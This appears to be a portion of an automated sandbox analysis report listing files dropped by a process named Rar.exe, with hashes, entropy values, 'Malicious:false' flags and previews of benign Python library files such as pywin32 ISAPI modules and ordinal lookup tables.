                                                                                                                                                                                                                                  SHA-256:1FD277E55903D05F4BF6628EAA378D19DD80F956BA1653E8CFA273E0AEE1FA9B
                                                                                                                                                                                                                                  SHA-512:533DFC39CD088A2DB67B9B2BF6AC13195A8670C9D0898797AB508DDB1DEB1F04D411F1C86F3ED3C7E5C69822689947B057170C1AED365A04BBFDC41354035F59
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This file is automatically generated by tools/idna-data.# vim: set fileencoding=utf-8 :..from typing import List, Tuple, Union.."""IDNA Mapping Table from UTS46."""...__version__ = "16.0.0"...def _seg_0() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]:. return [. (0x0, "V"),. (0x1, "V"),. (0x2, "V"),. (0x3, "V"),. (0x4, "V"),. (0x5, "V"),. (0x6, "V"),. (0x7, "V"),. (0x8, "V"),. (0x9, "V"),. (0xA, "V"),. (0xB, "V"),. (0xC, "V"),. (0xD, "V"),. (0xE, "V"),. (0xF, "V"),. (0x10, "V"),. (0x11, "V"),. (0x12, "V"),. (0x13, "V"),. (0x14, "V"),. (0x15, "V"),. (0x16, "V"),. (0x17, "V"),. (0x18, "V"),. (0x19, "V"),. (0x1A, "V"),. (0x1B, "V"),. (0x1C, "V"),. (0x1D, "V"),. (0x1E, "V"),. (0x1F, "V"),. (0x20, "V"),. (0x21, "V"),. (0x22, "V"),.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):54272
                                                                                                                                                                                                                                  Entropy (8bit):6.148775813397798
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:NJG3XLZ6PgxGlDboKh2wuHXDHopF4zk01s5YcCuzOVn1eo:NJoCBCuzOVn1e
                                                                                                                                                                                                                                  MD5:43FAA16056FBA69EEF1B052D715FA46F
                                                                                                                                                                                                                                  SHA1:D1EB4D1604B828DF78436E431B1B676D6E63C404
                                                                                                                                                                                                                                  SHA-256:96F3F828DCF671DBB24B3B52C20DF990954A77E636A3DE77BF35E4A041B52F89
                                                                                                                                                                                                                                  SHA-512:18D4E891EEF5CF70757946A67CD77186BE2723407F7EAC86D2A2A4CC4A13F29BA0F19B6830944C9FB8FBE0315CD1A6A27F534840966C05857FED8CDB3F3F0E92
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."..hLI.hLI.hLI...I.hLI..MH.hLI...I.hLI..IH.hLI..HH.hLI..OH.hLIV.MH.hLI..MH.hLI.hMI.hLI0.EH.hLI0.LH.hLI0..I.hLI0.NH.hLIRich.hLI........PE..L...,..d...........!.....~...R............................................................@.....................................................................`...(...T...............................@............................................text...\}.......~.................. ..`.rdata...........0..................@..@.data...............................@....rsrc...............................@..@.reloc..`...........................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1228
                                                                                                                                                                                                                                  Entropy (8bit):4.499657925503658
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:RlKrjxtACEOd/YACnNSwoKtTWxNm5b8WqAuvKMJbK:RErjxtj/Cjo4Tw+b8XAnkbK
                                                                                                                                                                                                                                  MD5:376B863A5D71D683CE42E07F90E31D70
                                                                                                                                                                                                                                  SHA1:0B352BA4DC53F35EB4F0AB2A59F1033791193013
                                                                                                                                                                                                                                  SHA-256:2566CAC7219E2D93BF8AB966F9542247307450FF213A4FE1C115635774ABF310
                                                                                                                                                                                                                                  SHA-512:81BF1BBFCF88ED20EE020B0D555DD96FE7E19F165C1D222A311E717AE1A189223BA7ABABAF774CDEB91C4C1C84B1BCE5063FABDBBEDE8FE8B15D9E9F8E560C73
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# The Python ISAPI package....# Exceptions thrown by the DLL framework..class ISAPIError(Exception):. def __init__(self, errno, strerror=None, funcname=None):. # named attributes match IOError etc.. self.errno = errno. self.strerror = strerror. self.funcname = funcname. Exception.__init__(self, errno, strerror, funcname).. def __str__(self):. if self.strerror is None:. try:. import win32api.. self.strerror = win32api.FormatMessage(self.errno).strip(). except:. self.strerror = "no error message is available". # str() looks like a win32api error.. return str((self.errno, self.strerror, self.funcname))...class FilterError(ISAPIError):. pass...class ExtensionError(ISAPIError):. pass...# A little development aid - a filter or extension callback function can.# raise one of these exceptions, and the handler module will be reloaded..# This means you can change
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4160
                                                                                                                                                                                                                                  Entropy (8bit):4.872533696011899
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:6AJQczz0jdpALt4DVI6HVt6Lu90PYC7drlFDeiI97qqUFXB6wpe3f04p:6hLVt6NQCxiihXMwcv04p
                                                                                                                                                                                                                                  MD5:F7697BC2AEAE59A9BEDFABD3192E80FF
                                                                                                                                                                                                                                  SHA1:BB4B1E7F5F7626F2F3DC2490931355658A6212D9
                                                                                                                                                                                                                                  SHA-256:0B67CC1EF06CCFD881C29DA61C775C52B634C7BCA1EAB5B19AC2A1685B0164EE
                                                                                                                                                                                                                                  SHA-512:06C654ED9EEE02BE94ED3FE7BB10E22A878EFCDE089916DECE2B4A305A27E7CC26FD743C31F43038AE87AB7AD1F93848E5499DF4AEC85254651833384AE585A1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview: NOTE: This HTML is displayed inside the CHM file - hence some hrefs. will only work in that environment.-->.<HTML>.<BODY>.<TITLE>Introduction to Python ISAPI support</TITLE>..<h2>Introduction to Python ISAPI support</h2>..<h3>See also</h3>.<ul>. <li><a href="/isapi_modules.html">The isapi related modules</a>. </li>. <li><a href="/isapi_objects.html">The isapi related objects</a>. </li>.</ul>.<p><i>Note: if you are viewing this documentation directly from disk, .most links in this document will fail - you can also find this document in the.CHM file that comes with pywin32, where the links will work</i>..<h3>Introduction</h3>.This documents Python support for hosting ISAPI exensions and filters inside.Microsoft Internet Information Server (IIS). It assumes a basic understanding .of the ISAPI filter and extension mechanism..<p>.In summary, to implement a filter or extension, you provide a Python module.which defines a Filter and/or Extension class. Once your class ha
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27548
                                                                                                                                                                                                                                  Entropy (8bit):4.80049866836599
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:hJYoQ+eiFRdjkLsgNUN5+E1pLYZgz2IvGc1d7NenkZ39NMm3XhKL7/Qtuja3IqL3:hJYB+dEZgfd7jnhKL7Lj8
                                                                                                                                                                                                                                  MD5:EEAACC07EF7A57FC7B89F22229302A20
                                                                                                                                                                                                                                  SHA1:5D811D557CA4EC188AA082F591E04E67F8EF9C7F
                                                                                                                                                                                                                                  SHA-256:E3CBDB7EEC55BBBFB01247DA999C44C0FDD2A195EE940102C7D486AA4D8F4A95
                                                                                                                                                                                                                                  SHA-512:D958531DEB0EB2544E9894F3F9903AD586D02EC818DCF10F2A1867427B24BC54000490EBD5CE4C01659F38D3ECF79AB35584DD3578BF8E62BE225DD9918816E5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Installation utilities for Python ISAPI filters and extensions."""..# this code adapted from "Tomcat JK2 ISAPI redirector", part of Apache.# Created July 2004, Mark Hammond..import imp.import os.import shutil.import stat.import sys.import traceback..import pythoncom.import win32api.import winerror.from win32com.client import Dispatch, GetObject.from win32com.client.gencache import EnsureDispatch, EnsureModule.._APP_INPROC = 0._APP_OUTPROC = 1._APP_POOLED = 2._IIS_OBJECT = "IIS://LocalHost/W3SVC"._IIS_SERVER = "IIsWebServer"._IIS_WEBDIR = "IIsWebDirectory"._IIS_WEBVIRTUALDIR = "IIsWebVirtualDir"._IIS_FILTERS = "IIsFilters"._IIS_FILTER = "IIsFilter".._DEFAULT_SERVER_NAME = "Default Web Site"._DEFAULT_HEADERS = "X-Powered-By: Python"._DEFAULT_PROTECTION = _APP_POOLED..# Default is for 'execute' only access - ie, only the extension.# can be used. This can be overridden via your install script.._DEFAULT_ACCESS_EXECUTE = True._DEFAULT_ACCESS_READ = False._DEFAULT_ACCESS_WRITE = False._DE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4114
                                                                                                                                                                                                                                  Entropy (8bit):5.185071284936749
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Nqm1DicrfeDD8kMzF6d0kcxzn2t3Q9sstnc9QRKPpP74s:z2crfEDIxzn2WRRKPNl
                                                                                                                                                                                                                                  MD5:CA18DB7C20AF8050260A221CEEEA7A3B
                                                                                                                                                                                                                                  SHA1:9FC7F2F131C6F48426E9D80146F1721335478498
                                                                                                                                                                                                                                  SHA-256:87876EF7D98051AE7BE5DEEE74A9007423B6C3447509CDE0DB6A1FD8BA1B3385
                                                                                                                                                                                                                                  SHA-512:E7141A1AC5E6E89B96BF11F7460BD2322F2B5FB96282A409D1D56B4DB0D4EA2B43A97EDB39AAFCBEBF808C060BADEEDF5446B7A8E8E09B52E1541E8BF9CAFD40
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Constants needed by ISAPI filters and extensions.""".# ======================================================================.# Copyright 2002-2003 by Blackdog Software Pty Ltd..#.# All Rights Reserved.#.# Permission to use, copy, modify, and distribute this software and.# its documentation for any purpose and without fee is hereby.# granted, provided that the above copyright notice appear in all.# copies and that both that copyright notice and this permission.# notice appear in supporting documentation, and that the name of.# Blackdog Software not be used in advertising or publicity pertaining to.# distribution of the software without specific, written prior.# permission..#.# BLACKDOG SOFTWARE DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,.# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN.# NO EVENT SHALL BLACKDOG SOFTWARE BE LIABLE FOR ANY SPECIAL, INDIRECT OR.# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESUL
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7877
                                                                                                                                                                                                                                  Entropy (8bit):4.715640535610007
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:eBNSH7SzvwWyrS9knaovBgTxaKqS2eqLFwtxKQUGBzYCvW:eDSH77XrS9kUYnS2eiwiwYWW
                                                                                                                                                                                                                                  MD5:E94564D9A392DCD2D053BEA5B750EDF6
                                                                                                                                                                                                                                  SHA1:C809C32E27BB0FC20FBA0FDBA379CE5E4A0E86C7
                                                                                                                                                                                                                                  SHA-256:244171C764D7E35F0558D3BE46D76223A11B469DD8B0186604059E4F2833C4CB
                                                                                                                                                                                                                                  SHA-512:DE08AA962A1D72F471618EDA9E11CA562F8FCBA3396D17E3DAD32215DC007E373EBDB1380711795AA8A165ED651677D9DD8342C3DF531599B80BE488995417B2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This extension demonstrates some advanced features of the Python ISAPI.# framework..# We demonstrate:.# * Reloading your Python module without shutting down IIS (eg, when your.# .py implementation file changes.).# * Custom command-line handling - both additional options and commands..# * Using a query string - any part of the URL after a '?' is assumed to.# be "variable names" separated by '&' - we will print the values of.# these server variables..# * If the tail portion of the URL is "ReportUnhealthy", IIS will be.# notified we are unhealthy via a HSE_REQ_REPORT_UNHEALTHY request..# Whether this is acted upon depends on if the IIS health-checking.# tools are installed, but you should always see the reason written.# to the Windows event log - see the IIS documentation for more...import os.import stat.import sys..from isapi import isapicon.from isapi.simple import SimpleExtension..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# Notes on reloading.# If yo
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4789
                                                                                                                                                                                                                                  Entropy (8bit):4.672778044819042
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:sG5aXbrq9zbjBJxRHugKn7AcOZRcBGOt6ALeQYuAHQQ0i:sGAXbr6DZ99K7AcOZyt6AaYCb
                                                                                                                                                                                                                                  MD5:2EB58F29631C6821D8A299983426CF40
                                                                                                                                                                                                                                  SHA1:9E9013BA1682555FAA42F5DFBD6819D93B547C9A
                                                                                                                                                                                                                                  SHA-256:499C76110B5D506499A3854DA0FB197001515A755838EF9EDD9821E126B04366
                                                                                                                                                                                                                                  SHA-512:3376874BFA3FBD2BE21E5196C46489DCAF53D2EF7C47C1E9305DD399C087E22A75E11DCAD4CDF9DE6345ED4E9427149BE23DFE08802B9F14A3EACDFAB9AEC45D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is a sample ISAPI extension written in Python..#.# Please see README.txt in this directory, and specifically the.# information about the "loader" DLL - installing this sample will create.# "_redirector.dll" in the current directory. The readme explains this...# Executing this script (or any server config script) will install the extension.# into your web server. As the server executes, the PyISAPI framework will load.# this module and create your Extension and Filter objects...# This is the simplest possible redirector (or proxy) we can write. The.# extension installs with a mask of '*' in the root of the site..# As an added bonus though, we optionally show how, on IIS6 and later, we.# can use HSE_ERQ_EXEC_URL to ignore certain requests - in IIS5 and earlier.# we can only do this with an ISAPI filter - see redirector_with_filter for.# an example. If this sample is run on IIS5 or earlier it simply ignores.# any excludes...import sys..from isapi import isapicon, threaded_extens
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2723
                                                                                                                                                                                                                                  Entropy (8bit):4.8440518325238875
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:r2m9gHV9aeJPLBZMATZhOcxerr3x8AHud1YKGaJxOoE8x6ALLaQYuAHQru5w/Fob:rV9G9zYATZpxerDxRHuwBaJN56ALeQYJ
                                                                                                                                                                                                                                  MD5:87F0CD8E3ECACAB6BC5AE7C8859624A6
                                                                                                                                                                                                                                  SHA1:B1D320A9C99C28534D12AFDD7716A5BE595313CB
                                                                                                                                                                                                                                  SHA-256:6E0ED62598D6806889B4554A85DB9FA63B719AF74F060BEE5AE4C1B99AF44AF4
                                                                                                                                                                                                                                  SHA-512:9528E5DC2B5D1559A3558FCA3F541186F9141B3487E4C7F275CF7451FDFC419DF92087FC3F02BF1DF36A01B7E84BB59292A7069E1C845A51D8940DAEEF0752DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is a sample ISAPI extension written in Python...# This is like the other 'redirector' samples, but uses asnch IO when writing.# back to the client (it does *not* use asynch io talking to the remote.# server!)..import sys.import urllib.error.import urllib.parse.import urllib.request..from isapi import isapicon, threaded_extension..# sys.isapidllhandle will exist when we are loaded by the IIS framework..# In this case we redirect our output to the win32traceutil collector..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# The site we are proxying..proxy = "http://www.python.org"..# We synchronously read chunks of this size then asynchronously write them..CHUNK_SIZE = 8192...# The callback made when IIS completes the asynch write..def io_callback(ecb, fp, cbIO, errcode):. print("IO callback", ecb, fp, cbIO, errcode). chunk = fp.read(CHUNK_SIZE). if chunk:. ecb.WriteClient(chunk, isapicon.HSE_IO_ASYNC). # and wait for the next callback to say thi
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6459
                                                                                                                                                                                                                                  Entropy (8bit):4.718310882378029
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:XGHkDjB5EpC79K4LdaPxZmI+gqehDSmI7b2u4R7AVYCIw:XGEDV5EpChbLdaJKBeYbTYXw
                                                                                                                                                                                                                                  MD5:B4F1ED76C296CB5A03E14CCC292CC9B2
                                                                                                                                                                                                                                  SHA1:9AF425A8903F4F06AAB99A2FF61F33BB1ECFBB4E
                                                                                                                                                                                                                                  SHA-256:F1B8AA33D41182EE3FFAD329A4CA2766B1C9693EE6C80F84E725C40D6E522AEB
                                                                                                                                                                                                                                  SHA-512:D5DF8D63C33E9E9A582218FCF8B229BE5CF0E2BC649B17192B08D6E37FA82A1B57F7455724A6771C1EBD74E5B15DCE99EB94AAEC639EAFBE896776D61CAEB9F1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is a sample configuration file for an ISAPI filter and extension.# written in Python..#.# Please see README.txt in this directory, and specifically the.# information about the "loader" DLL - installing this sample will create.# "_redirector_with_filter.dll" in the current directory. The readme explains.# this...# Executing this script (or any server config script) will install the extension.# into your web server. As the server executes, the PyISAPI framework will load.# this module and create your Extension and Filter objects...# This sample provides sample redirector:.# It is implemented by a filter and an extension, so that some requests can.# be ignored. Compare with 'redirector_simple' which avoids the filter, but.# is unable to selectively ignore certain requests..# The process is sample uses is:.# * The filter is installed globally, as all filters are..# * A Virtual Directory named "python" is setup. This dir has our ISAPI.# extension as the only application, mapped
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6318
                                                                                                                                                                                                                                  Entropy (8bit):4.566729696244953
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Iskw+JLCJx5KaB9GbV5qdO4U0p8K3aSzYLv4YqQFzCHLkWwUcdQUGBLHQYuAHQ4V:Isk2vBgT0aKqSaRzCHLFwtdQUGBzYC4W
                                                                                                                                                                                                                                  MD5:4898630ADAF813D8B0A23E92C377746A
                                                                                                                                                                                                                                  SHA1:8E5ADFF4FAFCA8CAA6DEEBF9490EB393C8E3EE59
                                                                                                                                                                                                                                  SHA-256:07A0ED251A46D73E2B00A13597F2B69BB7BE6035F88B8172573162407FA6B7CC
                                                                                                                                                                                                                                  SHA-512:D9F1C51F215EF170BC69D1FB6F95ABE76D626266FCAE9AC33AEC23119AB67E0DC6F42E294D22CAD8E29A77B381177AE4092390869AA544A460FBF08C888DD057
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This extension is used mainly for testing purposes - it is not.# designed to be a simple sample, but instead is a hotch-potch of things.# that attempts to exercise the framework...import os.import stat.import sys..from isapi import isapicon.from isapi.simple import SimpleExtension..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# We use the same reload support as 'advanced.py' demonstrates..import threading..import win32con.import win32event.import win32file.import winerror..from isapi import InternalReloadException...# A watcher thread that checks for __file__ changing..# When it detects it, it simply sets "change_detected" to true..class ReloadWatcherThread(threading.Thread):. def __init__(self):. self.change_detected = False. self.filename = __file__. if self.filename.endswith("c") or self.filename.endswith("o"):. self.filename = self.filename[:-1]. self.handle = win32file.FindFirstChangeNotification(. os.path.dir
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2444
                                                                                                                                                                                                                                  Entropy (8bit):4.437690052854761
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:p2C72ZW43m46ZEu/4adcD961wmQhHm46ZXnLVPM66G4YS961NT:p343oEBD+wmEHoXLBaaS+NT
                                                                                                                                                                                                                                  MD5:E63FC55BD3949A33079F97803140971D
                                                                                                                                                                                                                                  SHA1:9D52B4C9062B97F44ECEB5074F6D71117D750844
                                                                                                                                                                                                                                  SHA-256:435FB9AF375154250BA521A2D478D110D1E1A82E0311A6293611065824BED1F0
                                                                                                                                                                                                                                  SHA-512:7A15E6956D5BCA76E2C8C028896F9488E6DAE2A6B5E6B0624B8AD1EB280D9ABEFBA1488C76C74C25A87B710DF52C7AC752DAF34A0F01F7366C9ADE55FDCF1D97
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Simple base-classes for extensions and filters...None of the filter and extension functions are considered 'optional' by the.framework. These base-classes provide simple implementations for the.Initialize and Terminate functions, allowing you to omit them,..It is not necessary to use these base-classes - but if you don't, you.must ensure each of the required methods are implemented.."""...class SimpleExtension:. "Base class for a simple ISAPI extension".. def __init__(self):. pass.. def GetExtensionVersion(self, vi):. """Called by the ISAPI framework to get the extension version.. The default implementation uses the classes docstring to. set the extension description.""". # nod to our reload capability - vi is None when we are reloaded.. if vi is not None:. vi.ExtensionDesc = self.__doc__.. def HttpExtensionProc(self, control_block):. """Called by the ISAPI framework for each extension request... sub-cla
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4374
                                                                                                                                                                                                                                  Entropy (8bit):4.72440993117079
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:aQ6VvLzWLQHuOYl2dIIa4iq3+OYcRQsALeQYuAHQv0i:aQr2bYl2eIa4iqOOYwvAaYCQ
                                                                                                                                                                                                                                  MD5:A1328B4C7E2744F219AAAF7AD410BF95
                                                                                                                                                                                                                                  SHA1:FA9323DDA3ECA819FD2B099D9A27777E4F688186
                                                                                                                                                                                                                                  SHA-256:D9D6724BFCED45609F1D60ADB776DF6B2B56DBDCFBC6B6CB6C0C24F3DA329DB5
                                                                                                                                                                                                                                  SHA-512:5FA4C9AB245580417E1D1610ED8085E387F9EA1247CEB5D138127C5AFF58F033D76137701708752131F3F0032982D813B222F7A6E93481169C9266A176ADF566
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is an ISAPI extension purely for testing purposes. It is NOT.# a 'demo' (even though it may be useful!).#.# Install this extension, then point your browser to:.# "http://localhost/pyisapi_test/test1".# This will execute the method 'test1' below. See below for the list of.# test methods that are acceptable...import urllib.error.import urllib.parse.import urllib.request..# If we have no console (eg, am running from inside IIS), redirect output.# somewhere useful - in this case, the standard win32 trace collector..import win32api.import winerror..from isapi import ExtensionError, isapicon, threaded_extension.from isapi.simple import SimpleFilter..try:. win32api.GetConsoleTitle().except win32api.error:. # No console - redirect. import win32traceutil...# The ISAPI extension - handles requests in our virtual dir, and sends the.# response to the client..class Extension(threaded_extension.ThreadPoolExtension):. "Python ISAPI Tester".. def Dispatch(self, ecb):. pr
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7325
                                                                                                                                                                                                                                  Entropy (8bit):4.496571622826724
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:pIRBkE/cXV6YMNKUxA9yU/tjgcTaFHDZapRVqvk:p0x/YMNxOBVgcTKHDZNk
                                                                                                                                                                                                                                  MD5:C214741870D6B454C367B90334A686DC
                                                                                                                                                                                                                                  SHA1:0C53EA3491F82A1B4FA6196664E7B0463BE6AFFE
                                                                                                                                                                                                                                  SHA-256:C2F3CA495C0C326B3EE07F6337D9FF42AFE2D0CBC5F7E8BADDECFB12392515A0
                                                                                                                                                                                                                                  SHA-512:6CD978D45AB9EF55CBEC09CC40A9DB91F38FF536BEA77EAFE8493486966ECE2FE0E7F7E6084E560DBCC86394A268E31AB68255ADCD7F7F6D859BE95921F5E553
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""An ISAPI extension base class implemented using a thread-pool.""".# $Id$..import sys.import threading.import time.import traceback..from pywintypes import OVERLAPPED.from win32event import INFINITE.from win32file import (. CloseHandle,. CreateIoCompletionPort,. GetQueuedCompletionStatus,. PostQueuedCompletionStatus,.).from win32security import SetThreadToken..import isapi.simple.from isapi import ExtensionError, isapicon..ISAPI_REQUEST = 1.ISAPI_SHUTDOWN = 2...class WorkerThread(threading.Thread):. def __init__(self, extension, io_req_port):. self.running = False. self.io_req_port = io_req_port. self.extension = extension. threading.Thread.__init__(self). # We wait 15 seconds for a thread to terminate, but if it fails to,. # we don't want the process to hang at exit waiting for it.... self.setDaemon(True).. def run(self):. self.running = True. while self.running:. errCode, bytes, key, overlap
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):786
                                                                                                                                                                                                                                  Entropy (8bit):4.640291894679192
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:15TOFcft+h5ZrbwswaZgAGvrlLPpZYieoY7gn:jKFQt+f1bvwaZPGBDpZU1Mn
                                                                                                                                                                                                                                  MD5:0C3730FBD95E06FD87656297AA946407
                                                                                                                                                                                                                                  SHA1:E66187648E2055FC0CEB5C260766EC2DFC05A390
                                                                                                                                                                                                                                  SHA-256:FE7E3869702ABB571846D74BC34EA4966E8F75A6603530FE3F9E03C982D736A7
                                                                                                                                                                                                                                  SHA-512:633768BBF1CA63DA3093C09EBC65BF8A23332E823343387981560BEF7F555132310FEB95B86377C01BCAE54A6FF4A8A433FD585D8591D9DF737BF2B3E9412C59
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from . import oleaut32, ws2_32, wsock32..""".A small module containing a database of ordinal to symbol mappings for DLLs.which frequently get linked without symbolic information.."""..ords = {. b"oleaut32.dll": oleaut32.ord_names,. b"ws2_32.dll": ws2_32.ord_names,. b"wsock32.dll": wsock32.ord_names,.}...def formatOrdString(ord_val):. return "ord{}".format(ord_val).encode()...def ordLookup(libname, ord_val, make_name=False):. """. Lookup a name for the given ordinal if it's in our. database.. """. names = ords.get(libname.lower()). if names is None:. if make_name is True:. return formatOrdString(ord_val). return None. name = names.get(ord_val). if name is None:. return formatOrdString(ord_val). return name.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11759
                                                                                                                                                                                                                                  Entropy (8bit):4.899956061200747
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:cEoahhUHfbqXkcEX2k/TNwc8H2vpNbXc4uN5vHiuYQlIMizIYusfT3SPn:m/bqUMVfe7kV+O
                                                                                                                                                                                                                                  MD5:B51585D893B01C1D6D0830B3ED4F723B
                                                                                                                                                                                                                                  SHA1:5590B04F1639317750B69CC613CD5A17B467FC2D
                                                                                                                                                                                                                                  SHA-256:D3199A7EA2F1EF42A93CB8B20ACC752DE67789671CB4248584E2B43F441E5AAF
                                                                                                                                                                                                                                  SHA-512:04B02A4A0407DD87CD4C83505F81D6DCFBEB124E9CE3CDD52FB4125905D5C19F67B88FFF67B36CD17778B7F1264FE67E10DA74EF4246D5A142AAD07533B9113C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:ord_names = {. 2: b"SysAllocString",. 3: b"SysReAllocString",. 4: b"SysAllocStringLen",. 5: b"SysReAllocStringLen",. 6: b"SysFreeString",. 7: b"SysStringLen",. 8: b"VariantInit",. 9: b"VariantClear",. 10: b"VariantCopy",. 11: b"VariantCopyInd",. 12: b"VariantChangeType",. 13: b"VariantTimeToDosDateTime",. 14: b"DosDateTimeToVariantTime",. 15: b"SafeArrayCreate",. 16: b"SafeArrayDestroy",. 17: b"SafeArrayGetDim",. 18: b"SafeArrayGetElemsize",. 19: b"SafeArrayGetUBound",. 20: b"SafeArrayGetLBound",. 21: b"SafeArrayLock",. 22: b"SafeArrayUnlock",. 23: b"SafeArrayAccessData",. 24: b"SafeArrayUnaccessData",. 25: b"SafeArrayGetElement",. 26: b"SafeArrayPutElement",. 27: b"SafeArrayCopy",. 28: b"DispGetParam",. 29: b"DispGetIDsOfNames",. 30: b"DispInvoke",. 31: b"CreateDispTypeInfo",. 32: b"CreateStdDispatch",. 33: b"RegisterActiveObject",. 34: b"RevokeActiveObject",. 35: b"GetActiveObject",.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6003
                                                                                                                                                                                                                                  Entropy (8bit):5.011349622957264
                                                                                                                                                                                                                                  Encrypted:false
